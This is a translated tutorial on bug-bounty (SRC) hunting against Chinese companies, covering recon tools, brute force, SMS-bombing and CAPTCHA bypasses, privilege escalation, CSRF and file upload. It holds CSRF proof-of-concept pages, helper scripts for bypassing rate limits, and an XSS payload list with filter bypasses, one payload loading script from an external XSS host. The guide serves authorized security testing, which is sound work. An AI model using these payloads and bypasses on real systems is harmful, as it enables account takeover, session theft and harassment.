How SRC gangsters exploit vulnerabilities

Preliminary information collection

As the old saying goes, the essence of penetration testing is information collection. For weaker players without a 0-day, mining an SRC feels more like taking inventory of the company's assets. We often need to spend a long time collecting everything related to the company: its branches, wholly-owned subsidiaries, website domain names, mobile apps, WeChat mini programs, patent and brand information, email addresses, phone numbers, and so on. For the many SRCs being mined by thousands of people, if you can collect assets that others have missed, you are often not far from finding a vulnerability.

Collection of enterprise-related information
  • Qichacha (https://www.qcc.com)
  • Tianyancha (https://www.tianyancha.com/)
  • Qixinbao (https://www.qixin.com/)

Qichacha and Tianyancha both have one-day memberships available on Taobao, which is usually sufficient for our information collection. Personally, I prefer Qichacha because it can export domain names with one click and lets you view the subsidiaries associated with a company directly, which is more convenient.

Main inquiry information:

  1. Large SRCs generally have many subsidiaries. Qichacha can list the subsidiaries of a group under its group view, and can export them.
  2. Companies registered with the same phone number are basically subsidiaries.
  3. Looking at the equity penetration chart: generally, vulnerabilities in subsidiaries where the parent holds more than 50% of the shares are more likely to be accepted.
  4. Check the company's apps, mini-programs, and brand assets. Searching for brand names directly in search engines may yield unexpected results (assets that cannot be collected through normal means).

PS: Generally speaking, vulnerabilities in 100% wholly-owned subsidiaries will definitely be accepted by the SRC. For other subsidiaries' assets, you may need to check the scope and communicate with the SRC first (they tend to waffle).

  • Webmaster's Home (Chinaz): http://whois.chinaz.com/
    • Reverse lookup by email, registrant, or phone number.
    • Recommended project: https://github.com/code-scan/BroDomain, a sibling-domain query tool.
  • https://www.qimai.cn/
    • Qimai data can be used to find some relatively obscure apps owned by a company.

Information organization

Once we have collected information about the target company through the various means above, we should roughly have the following useful information:

  • All website domain name information belonging to the main company, branches and subsidiaries;
  • All patented brands and some independent systems developed by the main company, branches and subsidiaries.
  • All app assets and WeChat mini-programs under the main company, branches and subsidiaries.

After that, we need to summarize and organize this information: which are the company's main assets, which are marginal assets, and which assets appear to get little attention. Those are the ones we can focus on and dig deeper into.

Subdomain name collection and website information collection

As for subdomains, for me the features of OneForAll and xray are powerful enough. For some main domains, if you want to collect subdomains exhaustively, it is best to use an extra-large dictionary and brute-force at least three levels of subdomains.

This is where the Layer subdomain excavator shines.

Collect subdomains through github

Let me share a trick first. Many times, enthusiastic masters on GitHub have already collected and shared subdomain lists for a target, so you can first check GitHub for something ready-made to use for free. There is no good search syntax for this; you just have to hunt for a needle in a haystack.
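As a rough sketch of that needle-hunting, you can query GitHub's code-search API for mentions of the root domain and regex out anything that looks like a subdomain. This is a minimal assumption-laden example, not a polished tool: real searches need an authenticated personal access token and are rate-limited, and the regex will happily over-match.

```python
import json
import re
import urllib.parse
import urllib.request

def extract_subdomains(text, root):
    """Pull anything that looks like a subdomain of `root` out of raw text."""
    pattern = re.compile(r"[\w.-]+\." + re.escape(root))
    return {m.lower().lstrip(".") for m in pattern.findall(text)}

def github_code_search(root, token):
    """Query GitHub code search for files mentioning the root domain.
    Hypothetical usage sketch: needs a valid token, and results are paginated."""
    url = ("https://api.github.com/search/code?q="
           + urllib.parse.quote(f'"{root}"'))
    req = urllib.request.Request(url, headers={
        "Authorization": f"token {token}",
        "Accept": "application/vnd.github.v3.text-match+json",
    })
    with urllib.request.urlopen(req) as resp:
        items = json.load(resp).get("items", [])
    found = set()
    for item in items:
        for match in item.get("text_matches", []):
            found |= extract_subdomains(match.get("fragment", ""), root)
    return found

# Offline demo of the extraction step only:
print(extract_subdomains("see dev.example.com and api.example.com", "example.com"))
```

The extraction function is the reusable piece; you can point it at any blob of text (a shared wordlist, a crawled page) rather than the API.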

OneForAll

https://github.com/shmilylty/OneForAll

  • You need to fill in the API keys in the configuration file.
  • Modify other configuration options as needed. For example, you can configure some common ports and use it as a simple port scanner.

Commands

python oneforall.py --targets ./domain.txt run
python oneforall.py --targets ./domain.txt --brute true run


In actual use, I found that the subdomains returned with an external proxy connected are sometimes a bit different from those returned without one. Masters who want more comprehensive results can run it both with and without the proxy, then deduplicate the results.
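The dedup step can be a few lines of Python. A sketch, assuming each run was exported to a one-subdomain-per-line file (the file names are hypothetical; OneForAll actually writes CSVs under its results/ directory):

```python
def merge_subdomain_lists(*lists):
    """Case-insensitive union of several subdomain lists, sorted for easy diffing."""
    merged = {s.strip().lower() for lst in lists for s in lst if s.strip()}
    return sorted(merged)

# Hypothetical usage against two exported runs:
#   with open("run_with_proxy.txt") as a, open("run_without_proxy.txt") as b:
#       combined = merge_subdomain_lists(a, b)
```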

xray

Subdomain detection requires the advanced (paid) version. You can write a dozen lines of code for batch detection, or directly use the code in this project:

https://github.com/timwhitez/rad-xray. The command can be modified to detect subdomains in batches, usually taking 5 to 10 minutes per subdomain.

Goby

Official website: https://gobies.org/

For port scanning I had previously been using masscan + nmap, via this project: https://github.com/hellogoldsnakeman/masnmapscan-V1.0

I came across Goby some time ago, and this visual tool is quite comfortable to use. It can scan common ports in a short time and fingerprint websites, and the reports are easy to read.


In the actual port scanning process, because of CDNs and firewalls, there is no need to scan all ports at the beginning. According to experience shared by one master: if a scan finds that port 22 is open, the IP is probably not behind a CDN. We can extract such IPs and focus a full-port scan on them; the chance of a harvest is relatively high.
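That triage heuristic is easy to script. A minimal sketch, assuming you have already parsed masscan/nmap output into a mapping of IP to open ports (the port-22 telltale is the heuristic from the text, not a hard rule):

```python
def pick_full_scan_targets(scan_results, telltale_ports=(22,)):
    """Given {ip: open_ports}, keep IPs that are likely NOT behind a CDN:
    a CDN edge node normally won't expose SSH, so an open port 22 hints
    that the IP is a real origin worth a full 65535-port scan."""
    return [ip for ip, ports in scan_results.items()
            if any(p in ports for p in telltale_ports)]

# Example: only the second IP gets queued for a full-port scan.
results = {"203.0.113.10": {80, 443}, "203.0.113.20": {22, 80}}
full_scan_queue = pick_full_scan_targets(results)
```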

BBScan

This tool, written by master Zhuzhuxia, is a very fast and simple directory scanner. It is mainly useful for probing the many assets in a C segment and expanding the attack surface.

project address:

https://github.com/lijiejie/BBScan

https://github.com/yhy0/BBScan (springboot leak detection added)

  • Can scan domain names, IPs, and C segments
  • Quickly finds management back ends
  • Performs port detection
  • Detects sensitive information leaks
  • Scan rules can be customized

The reports under report/ will certainly contain many false positives, but there may be unexpected assets in the C segment.

JS information collection

This mainly means crawling a website's sensitive JS files. Information that can be collected from JS:

  • A larger attack surface (URLs, domain names)
  • Sensitive information (passwords, API keys, encryption methods)
  • Potentially dangerous function calls in the code
  • Frameworks with known vulnerabilities

Commonly used tools

JSFinder (fast): https://github.com/Threezh1/JSFinder

rad, xray's crawler: https://github.com/chaitin/rad

JSINFO-SCAN, which can also match sensitive information: https://github.com/p1g3/JSINFO-SCAN
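The core of what these tools do, minus the crawling, can be sketched as a couple of regexes over JS source. The patterns below are my own illustrative choices and will produce false positives; real tools ship much larger rule sets:

```python
import re

# Quoted absolute or root-relative URLs inside JS source
URL_RE = re.compile(r'["\'](https?://[^"\'\s]+|/[A-Za-z0-9_./-]{2,})["\']')
# Assignments that look like credentials or keys (illustrative, not exhaustive)
KEY_RE = re.compile(
    r'(?i)(api[_-]?key|secret|token|passwd|password)\s*[:=]\s*["\']([^"\']+)["\']')

def scan_js(source):
    """Return (urls, secrets) found in a blob of JavaScript source."""
    urls = [m.group(1) for m in URL_RE.finditer(source)]
    secrets = [(m.group(1), m.group(2)) for m in KEY_RE.finditer(source)]
    return urls, secrets
```

Feed it the body of each crawled .js file and triage the hits by hand.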

Some tips on picking out medium and low-risk vulnerabilities

When we first start mining SRCs, we often don't know where to begin. First, we can look at the vulnerability types listed in the drop-down box of each SRC platform's submission form.

Then learn to mine in a targeted way. For example, given the vulnerability types accepted by Zhaopin's SRC, we can learn the corresponding mining skills for each:

  • Framework injection
  • Cleartext password transmission
  • Form brute-force vulnerability
  • IIS short file name leak
  • Old and expired HTTPS service
  • Cross-directory download vulnerability
  • Directory listing vulnerability
  • LFI (local file inclusion) vulnerability
  • RFI (remote file inclusion) vulnerability
  • HTTP denial of service
  • Weak password login
  • CSRF (cross-site request forgery)
  • Flash clickjacking
  • SQL injection vulnerability
  • XSS (cross-site scripting) vulnerability
  • File upload vulnerability
  • Parsing vulnerability: IIS parsing vulnerability
  • Parsing vulnerability: Apache parsing vulnerability
  • Cookie injection vulnerability
  • Unauthorized access vulnerability
  • Command execution vulnerability
  • Struts2 remote code execution vulnerability
  • Business logic vulnerability
  • User privacy leak
  • Sensitive information leak (operations)
  • Sensitive information leak (R&D)
  • Sensitive file leak (operations, configuration)
  • Sensitive file leak (operations, permissions)
  • Unvalidated redirects and forwards
  • Flash cross-domain resource access
  • Test file leak
  • Dangerous HTTP methods enabled
  • HTTP parameter pollution
  • Unicode encoding bypass
  • Source code leak
  • Backend directory leak
  • Link injection vulnerability
  • SSRF (server-side request forgery)
  • JSONP hijacking


After learning the basic vulnerability types, we can read some real vulnerability reports.

For example, reports in the WooYun vulnerability library and on HackerOne.

  • WooYun vulnerability library: https://wooyun.x10sec.org/
  • HackerOne reports: https://pan.baidu.com/s/1jPUSuoERSIDw2zCKZ0xTjA Extraction code: 2klt

Below are some of the garbage-tier holes I often dig. As a mere mortal I can't dig the big ones, sorry ┭┮﹏┭┮.

Some common vulnerabilities in the login box

After we have collected preliminary information about the target, the first things we run into are all kinds of odd login boxes. Generally speaking, to reduce security issues, large enterprises use a unified login interface for their various affiliated websites.

However, some backend systems, operations systems, or edge businesses use independent registration and login systems, and that is where security issues often arise.

SMS code receiving platforms that are still available:

  • http://www.114sim.com/
  • https://yunduanxin.net/China-Phone-Number/
  • https://www.materialtools.com/

Brute forcing, credential stuffing, and user enumeration via bypassed restrictions

This is the most common class of vulnerability, especially in old backend systems, where the verification code can often be bypassed just by capturing and replaying the packet. Some common bypass techniques:

  • The verification code does not refresh
  • Capture the packet and replay it to bypass the verification code
  • Delete the verification code parameter to bypass it
  • Leave the verification code blank to bypass it
  • Modify the X-Forwarded-For header to bypass; recommended Burp plugin: https://github.com/TheKingOfDuck/burpFakeIP
  • Add a space after the account name to bypass the limit on failed login attempts

Generally speaking, a simple verification code bypass on its own is only low risk, so once you can bypass the verification code, be sure to try brute-forcing a wave of account passwords.
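Two of the tricks above (random X-Forwarded-For values and the trailing-space account variant) are trivial to generate. This sketch just produces the candidate values; whether a given target honors them is exactly what you are testing:

```python
import random

def fake_ip_headers():
    """A random spoofed client IP per attempt; rate limiters that naively
    trust X-Forwarded-For (what the burpFakeIP plugin automates) are fooled."""
    ip = ".".join(str(random.randint(1, 254)) for _ in range(4))
    return {"X-Forwarded-For": ip, "X-Real-IP": ip}

def account_variants(username):
    """Account-name variants that sometimes dodge per-account lockout counters."""
    return [username, username + " ", " " + username, username.upper()]
```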

Weak Password Vulnerability

When there is no verification code, or the verification code can be bypassed, just start dictionary brute-forcing. A few tips:

  • For example, fix a weak password such as 123456 and brute-force the account name instead.
  • Or first collect website information to build a targeted dictionary: domain names, employee emails, the company name, etc. Recommended tool, the Bailu social-engineering dictionary generator: https://github.com/HongLuDianXue/BaiLu-SED-Tool

The key to brute-forcing is the dictionary. Common dictionaries are available on GitHub, but plain weak passwords rarely work anymore. To increase the chance of success you need to try strong-looking passwords; see this Prophet (xz.aliyun) community article:

  • https://xz.aliyun.com/t/7823
  • https://github.com/huyuanzhi2/password_brute_dictionary
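The "strong-looking password" idea boils down to combining collected keywords with years and symbols. A minimal generator sketch; the patterns, years, and suffixes here are my own illustrative choices, not from the linked article:

```python
from itertools import product

def build_targeted_dict(keywords, years=("2020", "2021"),
                        suffixes=("!", "@", "#", "123")):
    """Combine company keywords (domain stem, brand, etc.) with years and
    symbols into passwords like Example@2021 that pass complexity rules."""
    words = set()
    for kw in keywords:
        for cap in (kw.lower(), kw.capitalize()):
            for year, suffix in product(years, suffixes):
                words.add(f"{cap}{suffix}{year}")
                words.add(f"{cap}{year}{suffix}")
    return sorted(words)
```

Feed it the domain stem, brand names, and short forms you collected earlier, then write the result out as your dictionary.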

When there is a verification code and it cannot be bypassed:

  • Search GitHub directly for employee account emails and passwords.
  • Search the source code or JS files for clues: emails, or encrypted account passwords.
  • For a specific system or CMS, use search engines to find the default administrator or test password.
  • Manually try common weak passwords.

SMS and email bombing vulnerabilities in registration, login, and password retrieval

This is quite common. Bombing a specific user will generally be accepted; horizontal bombing (spraying many numbers) merely consumes resources and is accepted inconsistently.

Common bypass techniques:

  • Add a space to bypass
  • Append an arbitrary letter to bypass
  • Prepend 86 (the country code) to bypass
  • Fake the IP with the X-Forwarded-For header
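The phone-parameter mutations are mechanical enough to enumerate in code; which one, if any, resets a given endpoint's per-number rate limit is target-specific:

```python
def sms_param_variants(phone):
    """Phone-parameter mutations that sometimes bypass per-number SMS rate
    limits: extra whitespace, a stray letter, or a country-code prefix."""
    return [
        phone,
        phone + " ",     # trailing space
        " " + phone,     # leading space
        phone + "a",     # stray letter
        "86" + phone,    # country-code prefix
        "+86" + phone,   # country code with plus
    ]
```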

Arbitrary user registration, login, and password reset vulnerabilities caused by logic flaws

Once a vulnerability appears in this area it is basically high risk, so I won't go into detail on mining ideas here.

There is a series of articles on FreeBuf about arbitrary user password reset; the ideas for similar vulnerabilities do not differ much:

https://www.freebuf.com/author/yangyangwithgnu

Common information leakage vulnerabilities

The scope of sensitive information leakage is very wide. I think it generally falls into two categories:

  • Internal information leakage within the enterprise due to configuration errors or improper management.
  • User data leakage (traversal) due to logical defects.

Information leakage via GitHub
  • GitHub search keywords shared in P Niu's Knowledge Planet: https://twitter.com/obheda12/status/1316513838716551169
  • GitHub leak monitoring project: https://github.com/FeeiCN/GSIL
  • Common leaks (there are some WooYun cases you can look at):
    • Employees' internal emails, login accounts, and passwords.
    • Internal system domain names and IPs.
    • Engineering code and website source code of corporate sites; you can search for them via keywords from employee emails. Pay attention to the date, as leaks that are several years old will most likely not be accepted.

Information leakage caused by configuration errors

This covers many types; the most important things are a powerful enough dictionary and a usable scanner.

When I actually run detection against a large number of domain names, I prefer a quick first pass with a streamlined small dictionary, for example:

  • Small dictionary of backup files
  • Springboot leaked small dictionary
  • A small dictionary in the backend of the website
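A sketch of what such a quick first pass looks like. The paths below are my own illustrative picks for the three small dictionaries above, and actually firing the requests (with requests/httpx and a thread pool) is left out:

```python
# Trimmed-down first-pass dictionary: a few entries per category.
SMALL_DICT = [
    ".git/config", "www.zip", "backup.tar.gz",   # backup files
    "actuator/env", "actuator/heapdump",         # Spring Boot leaks
    "admin/", "manage/", "login.jsp",            # admin back ends
]

def build_targets(base_url, words=SMALL_DICT):
    """Expand one base URL into the list of paths to probe."""
    base = base_url.rstrip("/")
    return [f"{base}/{w}" for w in words]
```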

The better-known scanners include dirsearch, dirmap, DirBuster, etc. Visual ones such as the TEST404 series and the Yujian scanner are also pleasant to use.

Note: swagger-ui exposure, which is quite common among information leaks, may be ignored or rated low risk if submitted as-is. Don't forget to test the leaked interfaces further.

Information leakage caused by privilege escalation

Many privilege escalation bugs come down to changing a single parameter, but more often you need to carefully test business functions one by one. Pay attention to operation parameters and object parameters: operation parameters generally correspond to create/read/update/delete actions on the specific business, while object parameters generally identify users or items.

Several burp plugins are recommended:

  • Unauthorized detection: https://github.com/theLSA/burp-unauth-checker
  • Sensitive parameter extraction: https://github.com/theLSA/burp-sensitive-param-extractor
  • Information extraction: https://github.com/theLSA/burp-info-extractor

These plugins basically help us quickly locate sensitive parameters; actual testing still requires carefully analyzing the application logic request by request.

Some common privilege escalation scenarios:

  • Horizontal escalation via user ID
  • Escalation via functional object ID
  • Escalation via uploaded object ID
  • Escalation via unauthenticated access
  • Escalation via function URL (forced browsing)
  • Escalation via an identity parameter in the interface
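The "change one parameter" test for horizontal escalation can be sketched as rewriting ID-like query parameters to a second account's value and diffing the responses. The parameter-name list is an assumption to extend per target:

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

ID_PARAMS = {"user_id", "uid", "id", "order_id", "account"}  # extend per target

def swap_id_params(url, other_id):
    """Rewrite ID-like query parameters to another user's value; replay the
    result with session A's cookies and compare responses to spot IDOR."""
    parts = urlsplit(url)
    query = [(k, other_id if k.lower() in ID_PARAMS else v)
             for k, v in parse_qsl(parts.query)]
    return urlunsplit(parts._replace(query=urlencode(query)))
```

The interesting part is the comparison afterwards: same status code and body length for both IDs under one session is the smell worth investigating.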

Other OWASP Top 10 vulnerabilities

CSRF vulnerability

When mining CSRF vulnerabilities, the most important thing is to explain the harm; that makes the report easier to argue for. Generally, CSRF vulnerabilities involving user data, money, or permissions have a high probability of being accepted, but the highest rating is usually medium risk. Still a fine way to pick up garbage-tier holes.

Common vulnerability points

1. Modify personal information, email, password, and avatar

2. Publish articles

3. Add and delete comments

4. Add, modify, and delete delivery addresses

5. Add administrator

(1) GET type

Exploiting GET-type CSRF is very simple and only requires a single HTTP request, so it is generally exploited like this:

<img src=http://www.xxxxx.com/csrf?xx=11 />


(2) POST type

There is no token parameter in the POST request and the request does not verify the Referer header; this is the most common type of CSRF.

Detection is also simple: trigger the function in the browser and capture the packet. If there are no token-like parameters, blank out the Referer header and resend the request. If the request succeeds, a CSRF vulnerability exists.
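The detection steps just described (strip the token-ish fields, blank the Referer, resend) can be sketched as pure request surgery; the token-name hints here are my own guesses at common field names:

```python
TOKEN_HINTS = ("token", "csrf", "nonce")  # assumed common token field names

def forge_replay(form_data, headers):
    """Build the replayed request: strip token-like form fields and drop the
    Referer header. If the server still accepts it, CSRF is likely present."""
    data = {k: v for k, v in form_data.items()
            if not any(hint in k.lower() for hint in TOKEN_HINTS)}
    hdrs = {k: v for k, v in headers.items() if k.lower() != "referer"}
    return data, hdrs
```

Pipe the result through your HTTP client of choice with the victim session's cookies attached, then compare the response with the original.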

PoC (Burp can generate this for you):

<html>
<body>
<form name="px" method="post" action="http://www.xxxxx.com/add">
<input type="text" name="user_id" value="1111">
</form>
<script>document.px.submit(); </script>
</body>
</html>


When the POST body is JSON and the server does not strictly verify the Content-Type, the PoC is:

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.xxxx.com/api/setrole");
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
xhr.send('{"role":"admin"}');
</script>


(3) Flash type

Flash CSRF is usually caused by an improperly configured crossdomain.xml file, and is exploited by using a SWF to initiate the cross-site request forgery.

Conditions for exploitation:

1. The crossdomain.xml file must exist under the target site

2. The configuration in crossdomain.xml allows other domains to make cross-domain requests.

<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>


Bypass Tips

  • Delete the csrf token
  • Send an empty csrf token
  • Change the request method, e.g. POST to GET
  • Replace the token with an arbitrary string of the same length, or try changing just one character and see what happens
  • Reuse a fixed (old) token
  • Change the token field name to token[]=

Arbitrary file upload vulnerability

This hole comes up fairly often. Generally the backend does not restrict the uploaded file type, but the uploaded script file will not be parsed, so there is no way to get a shell. (Many SRCs ignore arbitrary file upload to CDN or cloud storage servers.) Even so, there are still some angles:

  • Uploading an HTML file containing XSS code yields stored XSS (most likely ignored if it lands on a CDN-type server).
  • Upload malicious files for phishing.
  • Try prepending ../ to the uploaded file name to attempt directory traversal.
  • Combine with other vulnerabilities, such as CORS misconfigurations, to amplify the impact.
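The classic filename mutations used to probe an upload filter can be enumerated up front; this list is illustrative, not exhaustive:

```python
def upload_name_candidates(base="shell", ext="php"):
    """Filename mutations that probe common upload-filter weaknesses."""
    return [
        f"{base}.{ext}.jpg",      # whitelisted suffix appended
        f"{base}.{ext}.",         # trailing dot (stripped on Windows)
        f"{base}.{ext} ",         # trailing space
        f"{base}.{ext.upper()}",  # case variation
        f"../{base}.{ext}",       # traversal attempt in the stored name
        f"{base}.html",           # stored XSS via an uploaded HTML page
    ]
```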

The common file upload bypass techniques should be familiar to everyone. In actual testing, I found this problem often appears in the file upload step of corporate or personal identity verification.

XSS vulnerability

We are old acquaintances with XSS, so I won't go into detail; everyone should know the common techniques.

Share an article about me learning XSS: https://wizardforcel.gitbooks.io/xss-naxienian/content/index.html

Master Broken5's XSS payloads:

<script>alert(1)</script>
<script src=https://xsspt.com/VBAhTu></script>
<a href=javascript:alert(1)>xss</a>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<img src=https://www.baidu.com/img/bd_logo1.png onload=alert(1)>
<details open ontoggle=alert(1)>
<body onload=alert(1)>
<M onmouseover=alert(1)>M
<iframe src=javascript:alert(1)></iframe>
<iframe onload=alert(1)>
<input type="submit" onfocus=alert(1)>
<input type="submit" onclick=alert(1)>
<form><input type="submit" formaction=javascript:alert(1)>


Bypass techniques

<!-- spaces are filtered -->
<img/src="1"/onerror=alert(1)>

<!--Double write bypass -->
<iimgmg src=1 oonerrornerror=aimglert(1)>

<!-- Case bypass -->
<iMg src=1 oNerRor=alert(1)>

<!-- Using eval() -->
<img src=1 onerror="a=`aler`;b=`t(1)`;eval(a + b);">
<img src=1 onerror=eval(atob('YWxlcnQoMSk='))>

<!--Use location -->
<img src=1 onerror=location='javascript:alert(1)'>
<img src=1 onerror=location='javascript:\x61\x6C\x65\x72\x74\x28\x31\x29'>
<img src=1 onerror=location="javascr" + "ipt:" + "alert(1)">

<!-- Brackets are filtered -->
<img src=1 onerror="window.onerror=eval;throw'=alert\x281\x29';">

<!-- onerror=Filtered -->
<img src=1 onerror =alert(1)>
<img src=1 onerror
=alert(1)>

<!-- Attributes are converted to uppercase (HTML entities survive, since hex entities are case-insensitive) -->
<img src=1 onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>

<!-- Keyword detected: HTML-entity-encode the payload -->
<img src=1 onerror=alert&#40;1&#41;>


Submission of Threat Intelligence

I have no experience in this area, so I will just share two articles. Once you have collected the intelligence, it is still worth trying to submit it.

https://mp.weixin.qq.com/s/v2MRx7qs70lpnW9n-mJ7_Q

https://bbs.ichunqiu.com/article-921-1.html

You can also try joining all kinds of "wool-pulling" (freebie-abuse) groups, then turn around and report the wool-pullers in those groups as threat intelligence.

Some thoughts on discovering high-risk and severe vulnerabilities

I have only found a few high-risk and critical vulnerabilities, having mostly picked up medium- and low-risk ones, but I have read plenty of outstanding vulnerability reports along the way and would like to share some thoughts.

1. Ability to automate information collection

The information collection here is more about using existing tools to collect and organize quickly and automatically. It must be not only fast but also comprehensive, missing nothing. Often, this process itself is what uncovers vulnerabilities.

This work should be completed thoroughly during the early information collection stage, so collecting quickly and comprehensively is something we need to think about and keep practicing.

2. The ability to chain vulnerabilities into combos

An SRC's vulnerability rating mainly depends on the harm your vulnerability can cause, so when you find some low-risk vulnerabilities, don't rush to submit them; look for other exploitable points to chain them into a combo.

3. Ability to bypass waf

I am quite lacking in this ability. When I hit a WAF while digging, especially one from a big vendor, I am basically done; for bypassing other WAFs I just go straight to writeups from other masters.

4. Care, patience and some luck

If you dig carefully across the whole attack surface and add a bit of luck, you may land a high-risk finding.

Summary

Mining SRCs requires a good mindset. The domestic SRC ecosystem is not great, but SRCs do provide a relatively safe testing environment, so it is better to dig with a learning mentality, applying the knowledge we have flexibly to discover new problems.

Don't go in thinking "how many holes must I dig tonight, how much bounty will I get", or you may get three "ignored" verdicts in a row and your mentality will break.
